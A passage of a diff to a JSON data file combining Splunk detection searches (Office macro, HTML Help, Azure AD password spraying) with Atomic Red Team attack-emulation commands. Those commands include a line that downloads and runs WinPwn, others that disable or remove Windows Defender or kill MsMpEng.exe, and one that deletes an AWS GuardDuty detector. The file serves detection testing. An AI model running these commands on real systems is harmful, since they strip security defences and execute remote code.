\"POWERPNT.EXE\",\"onenote.exe\",\"onenotem.exe\",\"onenoteviewer.exe\",\"onenoteim.exe\", \"msaccess.exe\") ImageLoaded = \"*\\\\taskschd.dll\" | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image parent_process_name ProcessId ProcessGuid | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_creating_schedule_task_filter`", + "search": "`sysmon` EventCode=7 parent_process_name IN (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\",\"onenote.exe\",\"onenotem.exe\",\"onenoteviewer.exe\",\"onenoteim.exe\", \"msaccess.exe\") ImageLoaded = \"*\\\\taskschd.dll\" | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image parent_process_name ProcessId ProcessGuid | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_creating_schedule_task_filter`", "tags": { "name": "Office Document Creating Schedule Task", "analytic_story": [ @@ -488291,7 +493834,7 @@ { "name": "Office Document Executing Macro Code", "description": "this detection was designed to identifies suspicious office documents that using macro code. Macro code is known to be one of the prevalent weaponization or attack vector of threat actor. This malicious macro code is embed to a office document as an attachment that may execute malicious payload, download malware payload or other malware component. It is really good practice to disable macro by default to avoid automatically execute macro code while opening or closing a office document files.", - "search": "`sysmon` EventCode=7 parent_process_name IN (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\",\"onenote.exe\",\"onenotem.exe\",\"onenoteviewer.exe\",\"onenoteim.exe\",\"msaccess.exe\") ImageLoaded IN (\"*\\\\VBE7INTL.DLL\",\"*\\\\VBE7.DLL\", \"*\\\\VBEUI.DLL\") | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image process_name ProcessId ProcessGuid | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_executing_macro_code_filter`", + "search": "`sysmon` EventCode=7 parent_process_name IN (\"WINWORD.EXE\", \"EXCEL.EXE\", \"POWERPNT.EXE\",\"onenote.exe\",\"onenotem.exe\",\"onenoteviewer.exe\",\"onenoteim.exe\",\"msaccess.exe\") ImageLoaded IN (\"*\\\\VBE7INTL.DLL\",\"*\\\\VBE7.DLL\", \"*\\\\VBEUI.DLL\") | stats min(_time) as firstTime max(_time) as lastTime values(ImageLoaded) as AllImageLoaded count by Computer EventCode Image process_name ProcessId ProcessGuid | rename Computer as dest| `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `office_document_executing_macro_code_filter`", "tags": { "name": "Office Document Executing Macro Code", "analytic_story": [ @@ -488570,7 +494113,8 @@ "Qakbot", "AgentTesla", "CVE-2023-21716 Word RTF Heap Corruption", - "CVE-2023-36884 Office and Windows HTML RCE Vulnerability" + "CVE-2023-36884 Office and Windows HTML RCE Vulnerability", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -489945,7 +495489,8 @@ "Qakbot", "IcedID", "Azorult", - "Remcos" + "Remcos", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -490421,7 +495966,8 @@ "Qakbot", "IcedID", "Azorult", - "Remcos" + "Remcos", + "Warzone RAT" ], "asset_type": "Endpoint", "cis20": [ @@ -491627,14 +497173,14 @@ } ], "command_list": [ - "hh.exe \\T1218.001\\src\\T1218.001.chm\n", + "hh.exe \"\\T1218.001\\src\\T1218.001.chm\"\n", "hh.exe https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.001/src/T1218.001.chm\n", "Invoke-ATHCompiledHelp -HHFilePath $env:windir\\hh.exe -CHMFilePath Test.chm", "Invoke-ATHCompiledHelp -InfoTechStorageHandler its -HHFilePath $env:windir\\hh.exe -CHMFilePath Test.chm", "Invoke-ATHCompiledHelp -SimulateUserDoubleClick -CHMFilePath Test.chm", "Invoke-ATHCompiledHelp -ScriptEngine JScript -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\\hh.exe -CHMFilePath Test.chm", "Invoke-ATHCompiledHelp -ExecuteShortcutCommand -InfoTechStorageHandler its -TopicExtension html -HHFilePath $env:windir\\hh.exe -CHMFilePath Test.chm", - "hh.exe -decompile %temp% \\T1218.001\\src\\T1218.001.chm\n" + "hh.exe -decompile %temp% \"\\T1218.001\\src\\T1218.001.chm\"\n" ], "commands": [], "queries": [], @@ -491664,12 +497210,12 @@ "dependencies": [ { "description": "The payload must exist on disk at specified location (#{local_chm_file})\n", - "prereq_command": "if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm\" -OutFile \"#{local_chm_file}\"\n" + "prereq_command": "if (Test-Path \"#{local_chm_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{local_chm_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm\" -OutFile \"#{local_chm_file}\"\n" } ], "executor": { - "command": "hh.exe #{local_chm_file}\n", + "command": "hh.exe \"#{local_chm_file}\"\n", "name": "command_prompt" } }, @@ -491890,12 +497436,12 @@ "dependencies": [ { "description": "The payload must exist on disk at specified location (#{local_chm_file})\n", - "prereq_command": "if (Test-Path #{local_chm_file}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{local_chm_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm\" -OutFile \"#{local_chm_file}\"\n" + "prereq_command": "if (Test-Path \"#{local_chm_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{local_chm_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.001/src/T1218.001.chm\" -OutFile \"#{local_chm_file}\"\n" } ], "executor": { - "command": "hh.exe -decompile %temp% #{local_chm_file}\n", + "command": "hh.exe -decompile %temp% \"#{local_chm_file}\"\n", "cleanup_command": "del %temp%\\T1218.001.html >nul 2>&1\n", "name": "command_prompt" } @@ -492298,7 +497844,7 @@ { "name": "Detect HTML Help URL in Command Line", "description": "The following analytic identifies hh.exe (HTML Help) execution of a Compiled HTML Help (CHM) file from a remote url. This particular technique will load Windows script code from a compiled help file. CHM files may contain nearly any file type embedded, but only execute html/htm. Upon a successful execution, the following script engines may be used for execution - JScript, VBScript, VBScript.Encode, JScript.Encode, JScript.Compact. Analyst may identify vbscript.dll or jscript.dll loading into hh.exe upon execution. The \"htm\" and \"html\" file extensions were the only extensions observed to be supported for the execution of Shortcut commands or WSH script code. During investigation, identify script content origination. Review reputation of remote IP and domain. Some instances, it is worth decompiling the .chm file to review its original contents. hh.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*http* by Processes.dest Processes.user Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_url_in_command_line_filter`", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_hh` Processes.process=*http* by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_html_help_url_in_command_line_filter`", "tags": { "name": "Detect HTML Help URL in Command Line", "analytic_story": [ @@ -492312,7 +497858,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "An instance of $parent_proces_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ contacting a remote destination to potentally download a malicious payload.", + "message": "An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ contacting a remote destination to potentally download a malicious payload.", "mitre_attack_id": [ "T1218", "T1218.001" @@ -493465,7 +499011,7 @@ { "name": "Create or delete windows shares using net exe", "description": "This search looks for the creation or deletion of hidden shares using net.exe.", - "search": "| tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by Processes.process Processes.process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | search process=*share* | `create_or_delete_windows_shares_using_net_exe_filter` ", + "search": "| tstats `security_content_summariesonly` count values(Processes.user) as user values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_net` by Processes.process Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | search process=*share* | `create_or_delete_windows_shares_using_net_exe_filter` ", "tags": { "name": "Create or delete windows shares using net exe", "analytic_story": [ @@ -493658,8 +499204,8 @@ } ], "command_list": [ - "PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\n", - "invoke-expression 'cmd /c start powershell -Command {cmd /c \\..\\ExternalPayloads\\tor\\Tor\\tor.exe}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", + "& \"PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\"\n", + "invoke-expression 'cmd /c start powershell -Command {cmd /c \"\\..\\ExternalPayloads\\tor\\Tor\\tor.exe\"}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", "sudo systemctl start tor \n", "osascript -e 'tell application \"Terminal\" to do script \"tor\"'\n" ], @@ -493689,18 +499235,18 @@ }, { "description": "The Psiphon executable must exist in the Downloads folder\n", - "prereq_command": "if (Test-Path $env:UserProfile\\Downloads\\psiphon3.exe) {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest -OutFile \"$env:UserProfile\\Downloads\\psiphon3.exe\" \"https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe\"\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\psiphon3.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction ignore -Force | Out-Null\nInvoke-WebRequest \"https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\psiphon3.exe\" \n" }, { "description": "Batch file containing commands to run must be in src directory \n", - "prereq_command": "if (Test-Path PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat) {exit 0} else {exit 1}\n", - "get_prereq_command": "Invoke-WebRequest -OutFile \"PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\" \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat\"\n" + "prereq_command": "if (Test-Path \"PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\T1090.003\\src\\\" -ErrorAction ignore -Force | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat\" -OutFile \"PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\"\n" } ], "executor": { "name": "powershell", - "command": "PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\n", + "command": "& \"PathToAtomicsFolder\\T1090.003\\src\\Psiphon.bat\"\n", "cleanup_command": "$Proxy = Get-Content $env:Temp\\proxy-backup.txt -ErrorAction Ignore\nif($null -ne $Proxy) \n{Set-ItemProperty -Path 'HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings' -Name \"ProxyServer\" -Value $Proxy}\n" } }, @@ -493722,12 +499268,12 @@ "dependencies": [ { "description": "tor.exe must be installed on the machine \n", - "prereq_command": "if (Test-Path #{TorExe}) {exit 0} else {exit 1}\n", + "prereq_command": "if (Test-Path \"#{TorExe}\") {exit 0} else {exit 1}\n", "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://archive.torproject.org/tor-package-archive/torbrowser/11.0.6/tor-win32-0.4.6.9.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\tor.zip\"\nexpand-archive -LiteralPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\tor.zip\" -DestinationPath \"PathToAtomicsFolder\\..\\ExternalPayloads\\tor\"\n" } ], "executor": { - "command": "invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", + "command": "invoke-expression 'cmd /c start powershell -Command {cmd /c \"#{TorExe}\"}'\nsleep -s 60\nstop-process -name \"tor\" | out-null\n", "name": "powershell", "elevation_required": false } @@ -496359,7 +501905,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "$src_user$ account has rejected multiple Okta pushes.", + "message": "$user$ account has rejected multiple Okta pushes.", "mitre_attack_id": [ "T1110" ], @@ -496368,7 +501914,7 @@ ], "observable": [ { - "name": "src_user", + "name": "user", "type": "User", "role": [ "Attacker" @@ -496532,7 +502078,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "$src_user$ account has rejected multiple Okta pushes.", + "message": "$user$ account has rejected multiple Okta pushes.", "mitre_attack_id": [ "T1110" ], @@ -496541,7 +502087,7 @@ ], "observable": [ { - "name": "src_user", + "name": "user", "type": "User", "role": [ "Attacker" @@ -497232,7 +502778,7 @@ { "name": "Azure Active Directory High Risk Sign-in", "description": "The following analytic triggers on a high risk sign-in against Azure Active Directory identified by Azure Identity Protection. Identity Protection monitors sign-in events using heuristics and machine learning to identify potentially malicious events and categorizes them in three categories high, medium and low.", - "search": " `azuread` body.category=UserRiskEvents body.properties.riskLevel=high | rename body.properties.* as * | stats values(userPrincipalName) by _time, ipAddress, activity, riskLevel, riskEventType, additionalInfo | `azure_active_directory_high_risk_sign_in_filter`", + "search": " `azuread` category=UserRiskEvents properties.riskLevel=high | rename properties.* as * | stats values(userPrincipalName) as userPrincipalName by _time, ipAddress, activity, riskLevel, riskEventType, additionalInfo | `azure_active_directory_high_risk_sign_in_filter`", "tags": { "name": "Azure Active Directory High Risk Sign-in", "analytic_story": [ @@ -497246,7 +502792,7 @@ "Weaponization", "Exploitation" ], - "message": "A high risk event was identified by Identify Protection for user $body.properties.userPrincipalName$", + "message": "A high risk event was identified by Identify Protection for user $userPrincipalName$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -497407,7 +502953,7 @@ { "name": "Azure AD High Number Of Failed Authentications From Ip", "description": "The following analytic identifies an Ip address failing to authenticate 20 or more times to an Azure AD tenant in the span of 5 minutes. This behavior could represent a brute force attack againstan Azure AD to obtain initial access or elevate privileges. As environments differ across organizations, security teams should customize the threshold of this detection.", - "search": " `azuread` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(userPrincipalName) by ipAddress, _time | where failed_attempts > 20 | `azure_ad_high_number_of_failed_authentications_from_ip_filter`", + "search": " `azuread` category= SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(_raw) AS failed_attempts values(userPrincipalName) as userPrincipalName by ipAddress, _time | where failed_attempts > 20 | `azure_ad_high_number_of_failed_authentications_from_ip_filter`", "tags": { "name": "Azure AD High Number Of Failed Authentications From Ip", "analytic_story": [ @@ -497503,7 +503049,7 @@ { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with 30 unique valid users within 5 minutes. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nAzure AD tenants can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold if needed.", - "search": " `azuread` body.category= SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | where unique_accounts > 30 | `azure_ad_multiple_users_failing_to_authenticate_from_ip_filter`", "tags": { "name": "Azure AD Multiple Users Failing To Authenticate From Ip", "analytic_story": [ @@ -497517,7 +503063,7 @@ "Weaponization", "Exploitation" ], - "message": "Source Ip $body.properties.ipAddress$ failed to authenticate with 30 users within 5 minutes.", + "message": "Source Ip $ipAddress$ failed to authenticate with 30 users within 5 minutes.", "mitre_attack_id": [ "T1586", "T1586.003", @@ -497618,7 +503164,7 @@ { "name": "Azure AD Successful Authentication From Different Ips", "description": "The following analytic identifies an Azure AD account successfully authenticating from more than one unique Ip address in the span of 5 minutes. This behavior could represent an adversary who has stolen credentials via a phishing attack or some other method and using them to access corporate online resources around the same time as a legitimate user. As users may behave differently across organizations, security teams should test and customize this detection to fit their environments.", - "search": " `azuread` properties.authenticationDetails{}.succeeded=true category=SignInLogs | rename properties.* as * | bucket span=5m _time | stats dc(ipAddress) AS unique_ips values(ipAddress) values(appDisplayName) by _time, userPrincipalName | where unique_ips > 1 | `azure_ad_successful_authentication_from_different_ips_filter`", + "search": " `azuread` properties.authenticationDetails{}.succeeded=true category=SignInLogs | rename properties.* as * | bucket span=5m _time | stats dc(ipAddress) AS unique_ips values(ipAddress) as ipAddress values(appDisplayName) by _time, userPrincipalName | where unique_ips > 1 | `azure_ad_successful_authentication_from_different_ips_filter`", "tags": { "name": "Azure AD Successful Authentication From Different Ips", "analytic_story": [ @@ -497714,7 +503260,7 @@ { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "description": "The following analytic identifies one source Ip failing to authenticate with multiple valid users. This behavior could represent an adversary performing a Password Spraying attack against an Azure Active Directory tenant to obtain initial access or elevate privileges. Error Code 50126 represents an invalid password.\\\nThe detection calculates the standard deviation for source Ip and leverages the 3-sigma statistical rule to identify an unusual number of failed authentication attempts. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. This logic can be used for real time security monitoring as well as threat hunting exercises.\\\nWhile looking for anomalies using statistical methods like the standard deviation can have benefits, we also recommend using threshold-based detections to complement coverage. A similar analytic following the threshold model is `Azure AD Multiple Users Failing To Authenticate From Ip`.", - "search": " `azuread` body.category=SignInLogs body.properties.status.errorCode=50126 body.properties.authenticationDetails{}.succeeded= false | rename body.properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as tried_accounts by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg , stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1, 0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", + "search": " `azuread` category=SignInLogs properties.status.errorCode=50126 properties.authenticationDetails{}.succeeded=false | rename properties.* as * | bucket span=5m _time | stats dc(userPrincipalName) AS unique_accounts values(userPrincipalName) as userPrincipalName by _time, ipAddress | eventstats avg(unique_accounts) as ip_avg, stdev(unique_accounts) as ip_std by ipAddress | eval upperBound=(ip_avg+ip_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1,0) | where isOutlier = 1 | `azure_ad_unusual_number_of_failed_authentications_from_ip_filter`", "tags": { "name": "Azure AD Unusual Number of Failed Authentications From Ip", "analytic_story": [ @@ -497728,7 +503274,7 @@ "Weaponization", "Exploitation" ], - "message": "Possible Password Spraying attack against Azure AD from source ip $body.properties.ipAddress$", + "message": "Possible Password Spraying attack against Azure AD from source ip $ipAddress$", "mitre_attack_id": [ "T1586", "T1586.003", @@ -498660,7 +504206,7 @@ { "name": "Windows Multiple Users Failed To Authenticate From Process", "description": "The following analytic identifies a source process name failing to authenticate with 30 uniquer users. This behavior could represent an adversary performing a Password Spraying attack against an Active Directory environment to obtain initial access or elevate privileges. Active Directory environments can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold when needed. Event 4625 generates on domain controllers, member servers, and workstations when an account fails to logon. Logon Type 2 describes an iteractive logon attempt.\\\nThis logic can be used for real time security monitoring as well as threat hunting exercises. This detection will trigger on the potenfially malicious host, perhaps controlled via a trojan or operated by an insider threat, from where a password spraying attack is being executed. This could be a domain controller as well as a member server or workstation.\\\nThe analytics returned fields allow analysts to investigate the event further by providing fields like source process name, source account and attempted user accounts.", - "search": " `wineventlog_security` EventCode=4625 Logon_Type=2 ProcessName!=\"-\" | bucket span=5m _time | stats dc(TargetUserName) AS unique_accounts values(TargetUserName) as tried_accounts by _time, ProcessName, SubjectUserName, Computer | where unique_accounts > 30 | `windows_multiple_users_failed_to_authenticate_from_process_filter`", + "search": " `wineventlog_security` EventCode=4625 Logon_Type=2 ProcessName!=\"-\" | bucket span=5m _time | stats dc(TargetUserName) AS unique_accounts values(TargetUserName) as tried_accounts by _time, ProcessName, SubjectUserName, Computer | rename Computer as dest | where unique_accounts > 30 | `windows_multiple_users_failed_to_authenticate_from_process_filter`", "tags": { "name": "Windows Multiple Users Failed To Authenticate From Process", "analytic_story": [ @@ -498675,7 +504221,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Potential password spraying attack from $Computer$", + "message": "Potential password spraying attack from $dest$", "mitre_attack_id": [ "T1110.003", "T1110" @@ -498685,7 +504231,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "role": [ "Victim" ], @@ -498816,7 +504362,7 @@ { "name": "Windows Multiple Users Remotely Failed To Authenticate From Host", "description": "The following analytic identifies a source host failing to authenticate against a remote host with 30 unique users. This behavior could represent an adversary performing a Password Spraying attack against an Active Directory environment to obtain initial access or elevate privileges. Active Directory environments can be very different depending on the organization. Users should test this detection and customize the arbitrary threshold when needed. Event 4625 documents each and every failed attempt to logon to the local computer. This event generates on domain controllers, member servers, and workstations. Logon Type 3 describes an remote authentication attempt.\\\nThis logic can be used for real time security monitoring as well as threat hunting exercises. This detection will trigger on the host that is the target of the password spraying attack. This could be a domain controller as well as a member server or workstation.\\\nThe analytics returned fields allow analysts to investigate the event further by providing fields like source process name, source account and attempted user accounts.", - "search": " `wineventlog_security` EventCode=4625 Logon_Type=3 IpAddress!=\"-\" | bucket span=5m _time | stats dc(TargetUserName) AS unique_accounts values(TargetUserName) as tried_accounts by _time, IpAddress, Computer | where unique_accounts > 30 | `windows_multiple_users_remotely_failed_to_authenticate_from_host_filter` ", + "search": " `wineventlog_security` EventCode=4625 Logon_Type=3 IpAddress!=\"-\" | bucket span=5m _time | stats dc(TargetUserName) AS unique_accounts values(TargetUserName) as tried_accounts by _time, IpAddress, Computer | rename Computer as dest| where unique_accounts > 30 | `windows_multiple_users_remotely_failed_to_authenticate_from_host_filter` ", "tags": { "name": "Windows Multiple Users Remotely Failed To Authenticate From Host", "analytic_story": [ @@ -498830,7 +504376,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "Potential password spraying attack on $ComputerName$", + "message": "Potential password spraying attack on $dest$", "mitre_attack_id": [ "T1110.003", "T1110" @@ -498840,7 +504386,7 @@ ], "observable": [ { - "name": "ComputerName", + "name": "dest", "role": [ "Victim" ], @@ -501025,8 +506571,8 @@ "$excludedProcess = \"outlook.exe\"\nAdd-MpPreference -ExclusionProcess $excludedProcess", "$secure_pwd = \"#{password}\" | ConvertTo-SecureString -AsPlainText -Force\n$creds = New-Object System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $secure_pwd\nConnect-ExchangeOnline -Credential $creds\n$test = Get-AntiPhishRule\nDisable-AntiPhishRule -Identity $test.Name -Confirm:$false\nGet-AntiPhishRule\n", "Dism /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart /quiet", - "Try {cmd /c \\..\\ExternalPayloads\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows Defender\" -Recurse\n Try {cmd /c \\..\\ExternalPayloads\\AdvancedRun.exe /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", - "& \\..\\ExternalPayloads\\Backstab64.exe -k -n MsMpEng.exe", + "Try {cmd /c \"\\..\\ExternalPayloads\\AdvancedRun.exe\" /EXEFilename \"$env:systemroot\\System32\\sc.exe\" /WindowState 0 /CommandLine \"stop WinDefend\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\nif(#{delete_defender_folder}){\n $CommandToRun = rmdir \"$env:programdata\\Microsoft\\Windows Defender\" -Recurse\n Try {cmd /c \"\\..\\ExternalPayloads\\AdvancedRun.exe\" /EXEFilename \"$env:systemroot\\System32\\WindowsPowershell\\v1.0\\powershell.exe\" /WindowState 0 /CommandLine \"$CommandToRun\" /StartDirectory \"\" /RunAs 8 /Run} Catch{}\n}\n", + "& \"\\..\\ExternalPayloads\\Backstab64.exe\" -k -n MsMpEng.exe\n", "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ninv-phantom -consoleoutput -noninteractive ", "Set-MpPreference -drtm $True\nSet-MpPreference -dbm $True\nSet-MpPreference -dscrptsc $True\nSet-MpPreference -dbaf $True\n", "reg add \"HKCU\\Software\\Policies\\Microsoft\\Windows\\OOBE\" /v DisablePrivacyExperience /t REG_DWORD /d 1 /f\n", @@ -501043,6 +506589,7 @@ "swapon -a \nsleep 2\nswapoff -a\nsync\n", "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity\" /v \"Enabled\" /t REG_DWORD /d 0 /f\n", "REG ADD HKCU\\Software\\Classes\\CLSID\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\InProcServer32 /ve /t REG_SZ /d C:\\IDontExist.dll /f\n", + "detectorId=$(aws guardduty create-detector --enable --region \"us-east-1\" | grep -oP '(?<=\"DetectorId\": \")[^\"]*')\naws guardduty update-detector --no-enable --detector-id $detectorId\naws guardduty delete-detector --detector-id $detectorId\n", "Set-ItemProperty -Path HKLM:\\Software\\Policies\\Microsoft\\Windows\\PowerShell -Name ExecutionPolicy -Value ByPass;\n $shell = New-Object -ComObject Wscript.Shell\n Set-ExecutionPolicy Bypass | echo $shell.sendkeys(\"Y`r`n\")", "if (Get-Command \"Set-MPPreference\" -ErrorAction SilentlyContinue) {\n Set-MPPreference -DisableRealtimeMonitoring 1;\n} else {\n $service = Get-Service WinDefend -ErrorAction SilentlyContinue;\n if ($service) {\n if ($service.Status -eq \"Running\") {\n Stop-Service WinDefend;\n }\n } else {\n echo \"Windows Defender service not found.\";\n exit 1;\n };\n};\n", "Set-MpPreference -DisableIntrusionPreventionSystem $true;\nSet-MpPreference -DisableIOAVProtection $true;\nSet-MpPreference -DisableRealtimeMonitoring $true;\nSet-MpPreference -DisableScriptScanning $true;\nSet-MpPreference -EnableControlledFolderAccess Disabled;\n" @@ -501248,23 +506795,23 @@ "dependencies": [ { "description": "Sysmon must be downloaded\n", - "prereq_command": "if ((cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") -or (Test-Path PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\\Sysmon.exe)) { exit 0 } else { exit 1 }\n", - "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest \"https://download.sysinternals.com/files/Sysmon.zip\" -OutFile \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon.zip\"\nExpand-Archive PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon.zip PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon -Force\nRemove-Item PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon.zip -Force\n" + "prereq_command": "if (-not (cmd.exe /c \"where.exe Sysmon.exe 2> nul | findstr Sysmon 2> nul\") -or (Test-Path \"PathToAtomicsFolder\\..\\ExternalPayloads\\Sysmon\\Sysmon.exe\")) { exit 0 } else { exit 1 }\n", + "get_prereq_command": "New-Item -Type Directory \"PathToAtomicsFolder\\..\\ExternalPayloads\\\" -ErrorAction Ignore -Force | Out-Null\nInvoke-WebRequest 